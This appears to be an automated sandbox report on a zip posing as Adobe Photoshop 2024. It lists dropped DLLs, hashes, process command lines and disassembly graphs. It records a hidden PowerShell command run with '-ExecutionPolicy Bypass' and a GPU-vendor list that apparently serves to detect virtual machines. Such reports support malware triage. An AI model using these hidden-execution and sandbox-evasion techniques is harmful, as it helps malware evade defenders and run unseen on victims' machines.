                      SHA-512:F4B7FFC327A993D1674666A742285034AFD508450F5EDB748276E3F8640CFBA8B5945B90A2A935618529CB13AAFB7A21D5A29C455EC28FE15F06EBA881BD9A3B
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a..a..a..q...`..a...`..q...`..Richa..................PE..d...jHv\.........." .........v......................................................j..... .......................................................... ..(r...........z..................T............................................................................rdata..8...........................@..@.rsrc...(r... ...t..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PhotoshopCloud.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):2076688
                      Entropy (8bit):6.7366760545350175
                      Encrypted:false
                      SSDEEP:24576:N5YID88h/L78oK1/aMIPY91xYxQjAQc07PAP:N5YI88FIoK1/aMIPYOxQcQDS
                      MD5:6899362EF0C470A53DBDB42319F49178
                      SHA1:F6245E4FC5BA9F7133B4F09D32105124B75405E0
                      SHA-256:CB0DEE3B676254B6BD521C0341CFBC744238D0E8D00AB311D7A455C86B6EA57D
                      SHA-512:67D40A3522244DACD891ACC7364BE736E0E1506ACB08603329278B84F3A17844B716A6C9FEEE21D8C5CF26130AF4B15368C1D05E66BACF9BA702098342E23961
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y(..{..{..{S#.{..{S#.{...{S#.{..{:@.{..{..{...{.".{..{...z..{...z..{...z...{.yj{..{..{...{...z..{...{..{.{..{...z..{Rich..{........PE..d...k.rY.........." ...... ... ... ........................................... .....5~ ...`......................................... ........ ..(....0...........N...............c...=..T............................................(...............................text............................... ..`.rdata..............................@..@.data...Xl.......Z..................@....pdata...P.......P..................@..@.data1...6...`...6...2..............@....trace...............h..............@..@.gfids..............................@..@_RDATA..............................@..@.debug_o.8.......8..................@..@.rsrc........0......................@..@.reloc...J...@...J..................@..@.text....v......

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PhotoshopDat

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):10211521
                      Entropy (8bit):7.99998236621229
                      Encrypted:true
                      SSDEEP:196608:+gOGNUunizQlkdDiKucz3ROVSTXJbb1UcIa+pLHGKGkKn0:BIeoQIRz3ZJbRiprGE40
                      MD5:A5A2AC0B802E3AB855ABD338721A794F
                      SHA1:15126429C53037E823D0FC2A10A703C949F08FDF
                      SHA-256:28B25310D6AC1686F73E51B3CCC747658C7764D1E4F24537DCA0D44144F1AE28
                      SHA-512:C04E5DCE851390BD0138FB110798A75A13E46252958F599D11CB760DAB27E5D2EC3582124ADBE2713FA4352CE51FE02904F20E3915E4F5E896D5ED539DADA712
                      Malicious:false
                      Preview:7z..'....e.``......A........:8Q.G#...%.q.L.0s,f.o.d.....L).>.v..5.......m.vZ.<{S&..t....|(8..3]{..S-.2u;.v..x-. .......68.+.,?.fG.`/i_.......5........2Uk......[.v..$.#G~..jC#]l\=L#f...`......V.h.>.I..UR.....M-...pObT......T..7^.*..Lw...Y...n:.#..hW..&<?......r.<.w.k........v.,...Af........KN...H..i..r#fn&.g.K..n.^c...X.3z.\..B-A...y<w.Fh.....=Y..vy.2..1%...,mo.8:.D.Kk.. ..^.t....0I.Y.].k..o....9.$.:..h.K.@+.......a.....n.e.......4%Nj.?.S...W.:q....".}.<..o),;&.p/=.e.y1..~.;r......&.#..nwt..].....<.h..:.T.R...\..$....X.*..I...}..F..a.....R..B..).A..a...G.YA...N.x`.VJ.}}k..uz.~7@.j......9SgD.+*{..(i.`3..$~..zo.!Ax.....Y'.......*....../...n....8...(|..i.....Vk..j..p...W)..)..:4.@..........eg=.E..a.\?C.. ....i.......K........$.hs.>.n.:....U:.....3...<..N.>!.Q....9n.:...iv.bq...A.fI[r..a.&. ..]^C..h.....Bc.=.-].<5.Y....._._.E..T....W...Df..l/^q.53........*.S. .E.+...N..........j.{....~\.i...g9......$...8... ...a....U.v...v.bi..;.@3.g..w.......^h'?k#

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PhotoshopViews.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):2810896
                      Entropy (8bit):5.2124245916444405
                      Encrypted:false
                      SSDEEP:49152:rtnJP7mJCvptEt3vpAvu293R21irTm91jifcOXcinJjB5hyvqF5B16/i:d
                      MD5:E2E48EFE69CA49FC7A4E9BCA3C649C85
                      SHA1:795822BFD6AF7CD1041A33326C35A0E09EE49EA5
                      SHA-256:B45C60B328FCF1490A6581C69C8CB7C7F55C0175D2840EE2179DCEAF2A7C13DA
                      SHA-512:6141F14AC360344188E0A4CD3BD240668D3CE856EC99CE5CFEA3E027C657E0189A2AA7200497A786CE2417D338CA1F3A6F9A537FE5463455A0F76199CB354C52
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a..a..a..q...`..a...`..q...`..Richa..................PE..d...kHv\.........." ..........*...............................................*.....1s+... .......................................................... ....*...........*.................T............................................................................rdata..4...........................@..@.rsrc.....*.. ....*.................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Base.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):37376
                      Entropy (8bit):5.590379099778606
                      Encrypted:false
                      SSDEEP:384:DkVQtBgoTWil7mYAP7O6Zv3LuJil/oRohQ1yLFREnsUrKD2ZA3aC27gTzyp9HiBB:NzAP7O6JshC5oHaODCx4RukO
                      MD5:86969C007C4FA51DD80EBC69D763FCED
                      SHA1:78463E2C7CB8EB2EABA7836D36CB86A26D3382DF
                      SHA-256:EFB18FF012E9DA425186AA6ED4AEA58CD0FD14A464B9E1A5E233D7377E32253D
                      SHA-512:923A042F65017E148F71829B4087670A7C9F24ED66C03DD0167A5F5C75A8D11C7781960D53064B7B42C8C14850686682EE48C6433218726FEA1ED7E32A2A4515
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..f.........." ..................... ........@.. ....................................`.....................................J.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......PL..pW..........................................................^~....-.s.........~....*.0..c........r...p}.....r...p}.....r...p}.....(....}......}.....(......(....,.(....r...po..............(......*..0..........r...pr...p..(....(....*..s....%~....o....%~....o....%~....o....%.o....*..0..=.......r/..p( ......+......(!...-...o"...,.......X....i2.....&.....*...........66..%....0..c.......rI..p.rI..p(#....rQ..p.re..p.ro..p.r}..p..r...p..r...p..r...p..r...p..r...p..r...p..

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Business.XmlSerializers.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):92816
                      Entropy (8bit):6.125172855284245
                      Encrypted:false
                      SSDEEP:1536:AWvLKEFamnZ1fpO2gRsYQZnFYQy/bu4WUS7FwUAN7t8:AWvLKAamnZ1f02gRwRynWUS7FwUAN7+
                      MD5:7EC5EFCF844B2BF2660DD55B97EB7EB2
                      SHA1:3AF7EDBC9E8565CBFB489E449BBC55CB2FCF5584
                      SHA-256:69BFAA5B99EB8C5A8F09DF0B3B62FAE596FF93D1080B600BCBA8600B20B40D29
                      SHA-512:4F002CFEE65B865DD36B64CF49B51592171B00CAA412E2C969F880B921EEEE885B77432846D77036CD64E9EBDF6DAF7B97671F746C2AEF95DE1B19CCAEC51F0E
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f...........!................>(... ...@....... ...............................6....@..................................'..W....@...................X...`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ (......H.......4................................................................0../........(.....(......i...1..r...pr...p...t!.....(#...*6.(.....(....*....0../........(.....(......i...1..rK..pr...p...t......(....*6.(.....(....*....0..-........(.....(......i...1..ry..pr...p...t=...(....*6.(.....(....*..0...........-...,....(....*..-!.o...........(....(....-...(....z......(......,...r...p(.....r...pr...p.o....(.....r...pr...p.o......("....r...pr...p.o......(.....r...pr...p.o......(..

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Business.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):725136
                      Entropy (8bit):6.078630871771495
                      Encrypted:false
                      SSDEEP:12288:RrRu+dQO1LHtA4CXT/1pYTm5nF5LWFGU7N:Hu+dQO1LiMTm1LWFGU7N
                      MD5:288AF1FD50AC648250640B18C6D43FE5
                      SHA1:A74A9E63188D29819A54D25643D124355EBD828B
                      SHA-256:DDBC8FA1B70390356730264054983FF29508E5E3F56C544AEB20FA623D812A1E
                      SHA-512:BD00D65C9EF59DC67E473F8AD3F6617B41CB1A0C10083C6C3B8B67CB6A8B2AA9E09ADA620D63EFF4C31B411AF0C5894EDFB79A9A9955562074140B20663CDDDE
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ....................... ............`.................................3...O........................X..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................g.......H..........."............................................................{....*"..}....*..{....*"..}....*..(1...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(1...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(1...*...0..Q.......(2.....(3...s+.....o0....(2....(4......(5......(6...#.......?7..

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Contracts.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):315536
                      Entropy (8bit):5.914190177135487
                      Encrypted:false
                      SSDEEP:6144:T4k+SzYAICVeLCsATqIO0ODBJcQO7DtgDVwaY5wBUS7FGUAM7N:pzCLLftDBbO7ZWFpv7N
                      MD5:01660E9C744394E9D162661CA3A36650
                      SHA1:B4E8B0201A0FF7696E74DE1C99272FB04E2D44F2
                      SHA-256:BCA8753184130E03DBD230F88FA1836679B87A6E75EE6D328CCEAAFF42C75873
                      SHA-512:8C84A37C45756BF44546F3BFA7D660BF47468643251AE2E351E44FFB7FB71DBC45461C0F465549707CB673BB18B7253384E5F6A4BB85B218323A788EE9BB4858
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.........." ..0..l..........&.... ........... ...............................0....`....................................O....................x...X........................................................... ............... ..H............text...,k... ...l.................. ..`.rsrc................n..............@..@.reloc...............v..............@..B........................H.......4...h............................................................0..........s....%.r...po.....s....o....%.r...po.....s....o....%.r%..po.....s....o....%.r3..po.....s....o....%.r;..po.....s....o....%.rI..po.....s....o....*.0..........s....%re..p.ri..po....r}..p.r...po....(.....s....o....%re..p.ri..po....r}..p.r...po....(.....s....o....%.r...po.....s....o....%.r...po.....s....o....*...0..a.......s....%.r...po.....s....o....%.r...po.....s....o....%.r...po.....s....o......

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Data.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):295056
                      Entropy (8bit):5.085365992031979
                      Encrypted:false
                      SSDEEP:6144:LM9LI6pnuXorHDn95ii0vhP4bHKbUaKWv0IZ7D7Gn4OPKHthkGKUS7F0UUAh7X:LM9LrpnuXorHDn95ii0vhP4bHKbiWMIs
                      MD5:59EC35847C4621CEB07521ADC4F89D42
                      SHA1:EE69C9A1A209DD76B62061408E2E650246762C28
                      SHA-256:574382F97CA9CFFB4BD1B0C64B674EA160AF2B87D4F5F311CE4C5F380F59BAAC
                      SHA-512:B07F89E617E9C240EEF6721E727C07CFA4FD8603151EFDAFB2AE3F23449CF06CA2C7E6F7F52352CBFE0DAA6D83CEF29E7CDC28FE052306274EBAA194A64420FF
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.........." ..0..............:... ...@....... ..............................A.....`.................................d:..O....@...............(...X...`......,9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................:......H.......$....3............................................................{....*:.(......}....*..0..)........u..........,.(.....{.....{....o....*.*.*v ... )UU.Z(.....{....o....X*..0..:........r...p......%..{.......%q.........-.&.+.......o.....(....*..{....*:.(......}....*....0..)........u..........,.(.....{.....{....o....*.*.*v .]% )UU.Z(.....{....o....X*..0..:........r#..p......%..{.......%q.........-.&.+.......o.....(....*..{....*:.(......}....*....0..)........u..........

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.DiagramNet.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):110120
                      Entropy (8bit):5.827071272944168
                      Encrypted:false
                      SSDEEP:1536:KTCJGbAd9D6D0OG8Zbl2koN0MsDjc1yNyhV+RZVxVavnbPmKk8UA5iDvQUAHeis:GCQj0OGkbEkoNwj+LC8UA5JUA+n
                      MD5:905A26671B50C74A01FDCAD92D0F6649
                      SHA1:BBC02C23033A56DAFE9B4D148F95F3EB5B069890
                      SHA-256:14CD18F2146D52F584E7DB4250048A3197D66DBF1C7A491EF10434AA6DAA1313
                      SHA-512:7EA16B556676286B263A216FC8A10BF14067607AFE2DBBA52DB4C14B4929B49156CF5C09952409C75026422F16F1B774A4DDD6C0B7DB4957189DC113B893380F
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....O...........!.....0... .......N... ...`....... ....................................@..................................N..W....`...............`..(N........................................................... ............... ..H............text........ ...0.................. ..`.rsrc........`.......@..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShopDiagram

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):56
                      Entropy (8bit):3.8879987889261045
                      Encrypted:false
                      SSDEEP:3:KRstFoPEtLoO4AY5cwLcOCMn:K+7EEtLoZAY5Dc+n
                      MD5:CD9447EF8116A3103E002DC719B21F7C
                      SHA1:55374FB9785CDA3D7A226163203D1EBC664C9BD8
                      SHA-256:1E6DB4581F3290E40ADAC1F4548B82D0A3A961ED01CC137B2BFB38B379E50AC2
                      SHA-512:35163DC643C2A81678ACB59B0E1C8AC08036423CC57D7AD05E341D52BB059827A2270C9BB62996DD28231C2AB4B7267D45B9236C9491C380B2874AD7D6CF5CCF
                      Malicious:false
                      Preview:intel..nvidia..radeon..3dfx..amd..ati..matrox..sony..xgi

                      C:\Users\user\AppData\Local\Temp\unarchiver.log

                      Download File
                      Process:C:\Windows\SysWOW64\unarchiver.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3503
                      Entropy (8bit):5.33341630052992
                      Encrypted:false
                      SSDEEP:48:CBJZDG5Gb5G5GpbGhtG5Gp3BcGb3GCBcGxGyG5GkG5GzGzGRGtnbZwrZChFZAZy9:CoxH/e6jqv89GkrqU3
                      MD5:0C6B65DB58A709A1FB05F72320109E93
                      SHA1:F6F0CC3F60CA9A82B217FEA2CA83AC1F38EBF8D8
                      SHA-256:321CDFCACC601C28AB40582FAC6F6FF5892F8001903407B698512AA7A7EADA69
                      SHA-512:D4266B2FB08E25B64DAC95DE206BC300525C06DE1619722CF9E4F031C84A44728221745DB7998478128B7D5C6CA6829B5E931A14B97A9EC33A06149A75FD4F11
                      Malicious:false
                      Preview:09/11/2024 5:37 AM: Unpack: C:\Users\user\Desktop\Adobe_Photoshop_2024 (1).zip..09/11/2024 5:37 AM: Tmp dir: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg..09/11/2024 5:37 AM: Received from standard out: ..09/11/2024 5:37 AM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..09/11/2024 5:37 AM: Received from standard out: ..09/11/2024 5:37 AM: Received from standard out: Scanning the drive for archives:..09/11/2024 5:37 AM: Received from standard out: 1 file, 23182330 bytes (23 MiB)..09/11/2024 5:37 AM: Received from standard out: ..09/11/2024 5:37 AM: Received from standard out: Extracting archive: C:\Users\user\Desktop\Adobe_Photoshop_2024 (1).zip..09/11/2024 5:37 AM: Received from standard out: --..09/11/2024 5:37 AM: Received from standard out: Path = C:\Users\user\Desktop\Adobe_Photoshop_2024 (1).zip..09/11/2024 5:37 AM: Received from standard out: Type = zip..09/11/2024 5:37 AM: Received from standard out: Physical Size = 23

                      C:\Users\user\Desktop\logs\2024-09-11_Offline.log

                      Download File
                      Process:C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2637
                      Entropy (8bit):5.004229664929814
                      Encrypted:false
                      SSDEEP:48:i9JvGJnqtxcG5z0pEVY1MonqtxcG5z0pEVY1MO:EIq4G5OGe1q4G5OGex
                      MD5:3598F6AEDE2F990DE830D7CFE290B7DC
                      SHA1:EB18BC953CAD96F0BB97F6CE580933A45A5CF2E2
                      SHA-256:8D153DED7482ECD995DBC01DD4FB72B3622E3B1071E48E85AE47AA1B72074FEC
                      SHA-512:F592329E6A74C8CAF2A5768C42904ABF7F849691311836984D7A5DCC7CD1755F2EB0A375A51FFD5244A8080AC7CC515C9B2C8F6E7134C86831A292E62E188C69
                      Malicious:false
                      Preview:05:37:23.027|ERROR.|InvoiceOfflineImport.| Processing excOUT System.NullReferenceException: Object reference not set to an instance of an object... at InvoiceOfflineImport.DbConnectionManagerSQL.GetConnectionString(String name).. at SShop.Data.Transaction.DbTransactionInfo.GetConnectionString(String name).. at DynamicInjector0347e96c7e834f528413a456c068cf9d(Object[] ).. at Ninject.Activation.Providers.StandardProvider.Create(IContext context).. at Ninject.Activation.Context.ResolveInternal(Object scope).. at Ninject.Activation.Context.Resolve().. at Ninject.KernelBase.Resolve(IRequest request, Boolean handleMissingBindings, Boolean filterImplicitBindings).. at Ninject.KernelBase.Resolve(IRequest request).. at Ninject.ResolutionExtensions.GetResolutionIterator(IResolutionRoot root, Type service, Func`2 constraint, IEnumerable`1 parameters, Boolean isOptional, Boolean isUnique).. at Ninject.ResolutionExtensions.Get[T](IResolutionRoot root, IParameter[] parameters)..

                      Static File Info

                      General

                      File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                      Entropy (8bit):7.999501802327872
                      TrID:
                      • ZIP compressed archive (8000/1) 100.00%
                      File name:Adobe_Photoshop_2024 (1).zip
                      File size:23'182'330 bytes
                      MD5:37c3d10abf89febf3f2ad91f16c39f51
                      SHA1:4325fabfa5e1d2b58926274354b3466aef8bd3b3
                      SHA256:802f0d869b63e4302dfeff1905708232402373d308cc112130593ed428b6a667
                      SHA512:56cce8fec2bf62132dec07269f967b0d56dc9f578619d1c30132835f08c988456c491247d69bb963b188a4c11178893d501605f42eba06c8d443fb5aaa4b5d3f
                      SSDEEP:393216:ygYub5Xuoqm8N9n7xFLKnbC4exEmNrzPmGqZMC+Z+4kLtrYOQ6:PxENZ72ngeMwf+Z+4kN7
                      TLSH:B83733D26732DD09C6860FBB6539D05AF1A21419F596B832A49C9C231F3860F719FAFC
                      File Content Preview:PK........w..Ye.o.rz..(.......Adobe_Photoshop_2024.exe.:.x.........V.]iW.cK....d'....?I .B...`....p!kV./....%.........G.+.....w@...^.9Rr.@.R...P..{of.Z..S..xf..7..y3.f...=.Z..B.........7......).G.r.....sK..~...K.!.^..rV..S.....N].s.Y.[.6w..G...O_....{.<.X

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Network Behavior

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 11, 2024 11:37:36.408442020 CEST53649881.1.1.1192.168.2.5

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:05:37:18
                      Start date:11/09/2024
                      Path:C:\Windows\SysWOW64\unarchiver.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\Adobe_Photoshop_2024 (1).zip"
                      Imagebase:0xb60000
                      File size:12'800 bytes
                      MD5 hash:16FF3CC6CC330A08EED70CBC1D35F5D2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:2
                      Start time:05:37:18
                      Start date:11/09/2024
                      Path:C:\Windows\SysWOW64\7za.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg" "C:\Users\user\Desktop\Adobe_Photoshop_2024 (1).zip"
                      Imagebase:0xf60000
                      File size:289'792 bytes
                      MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:3
                      Start time:05:37:18
                      Start date:11/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:05:37:20
                      Start date:11/09/2024
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:"cmd.exe" /C "C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe"
                      Imagebase:0x790000
                      File size:236'544 bytes
                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:05:37:20
                      Start date:11/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:6
                      Start time:05:37:20
                      Start date:11/09/2024
                      Path:C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe
                      Imagebase:0x7f0000
                      File size:448'040 bytes
                      MD5 hash:D71C5F6E1CBCC6AB812D3433FFF7BE31
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 0%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:8
                      Start time:05:37:20
                      Start date:11/09/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;"
                      Imagebase:0xf20000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:9
                      Start time:05:37:20
                      Start date:11/09/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:21.7%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:73
                        Total number of Limit Nodes:4
                        execution_graph 1156 135b1b4 1157 135b1d6 GetSystemInfo 1156->1157 1159 135b210 1157->1159 1188 135ab76 1189 135abe6 CreatePipe 1188->1189 1191 135ac3e 1189->1191 1192 135a370 1194 135a392 RegQueryValueExW 1192->1194 1195 135a41b 1194->1195 1160 135a933 1161 135a962 WriteFile 1160->1161 1163 135a9c9 1161->1163 1114 135a172 1115 135a1c2 FindNextFileW 1114->1115 1116 135a1ca 1115->1116 1117 135afb2 1118 135afde FindClose 1117->1118 1120 135b010 1117->1120 1119 135aff3 1118->1119 1120->1118 1125 135a5fe 1126 135a636 CreateFileW 1125->1126 1128 135a685 1126->1128 1137 135abe6 1138 135ac36 CreatePipe 1137->1138 1139 135ac3e 1138->1139 1164 135a120 1165 135a172 FindNextFileW 1164->1165 1167 135a1ca 1165->1167 1140 135a962 1142 135a997 WriteFile 1140->1142 1143 135a9c9 1142->1143 1168 135a2ae 1170 135a2b2 SetErrorMode 1168->1170 1171 135a31b 1170->1171 1196 135a6d4 1197 135a716 CloseHandle 1196->1197 1199 135a750 1197->1199 1102 135a716 1103 135a742 CloseHandle 1102->1103 1104 135a781 1102->1104 1105 135a750 1103->1105 1104->1103 1110 135b1d6 1111 135b202 GetSystemInfo 1110->1111 1112 135b238 1110->1112 1113 135b210 1111->1113 1112->1111 1200 135a850 1202 135a882 SetFilePointer 1200->1202 1203 135a8e6 1202->1203 1204 135a5dc 1206 135a5fe CreateFileW 1204->1206 1207 135a685 1206->1207 1129 135a2da 1130 135a306 SetErrorMode 1129->1130 1131 135a32f 1129->1131 1132 135a31b 1130->1132 1131->1130 1172 135ad04 1173 135ad2a DuplicateHandle 1172->1173 1175 135adaf 1173->1175 1133 135aa46 1135 135aa6c CreateDirectoryW 1133->1135 1136 135aa93 1135->1136 1144 135a882 1146 135a8b7 SetFilePointer 1144->1146 1147 135a8e6 1146->1147 1176 135a78f 1177 135a7c2 GetFileType 1176->1177 1179 135a824 1177->1179 1180 135aa0b 1182 135aa46 CreateDirectoryW 1180->1182 1183 135aa93 1182->1183 1184 135af8b 1186 135afb2 FindClose 1184->1186 1187 135aff3 1186->1187

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_0168066A 1 Function_0168026D 2 Function_01352430 3 Function_0135A933 4 Function_0135A33D 5 Function_0135213C 6 Function_01690C60 7 Function_0135A23A 8 Function_0135B121 9 Function_0135A120 10 Function_0168067F 11 Function_0135AF22 12 Function_0135A02E 13 Function_0135AD2A 14 Function_01690748 15 Function_0168064A 15->0 16 Function_0135A716 17 Function_0135B01E 18 Function_0135A005 19 Function_0135AE05 20 Function_0135AD04 21 Function_01352006 22 Function_0135AB06 23 Function_0135AF00 24 Function_01690C50 25 Function_01680052 26 Function_0135A50F 27 Function_0135AA0B 28 Function_0135B276 29 Function_0135AB76 30 Function_0135A370 31 Function_0135B470 32 Function_0168082E 33 Function_0135A172 34 Function_0135267C 35 Function_0135257F 36 Function_0135A078 37 Function_01690739 38 Function_01352264 39 Function_01352364 40 Function_0135A566 41 Function_01690C3D 42 Function_0135A962 43 Function_0135A462 44 Function_0135AC6C 45 Function_01690E08 86 Function_01690BA0 45->86 46 Function_0135B351 47 Function_0135A850 48 Function_0135B052 49 Function_0135B15D 50 Function_01680000 51 Function_0135A45C 52 Function_01352458 53 Function_01680606 54 Function_01680807 55 Function_01690006 56 Function_01680718 57 Function_01352B44 58 Function_01690E18 58->86 59 Function_0135AA46 60 Function_0135B246 61 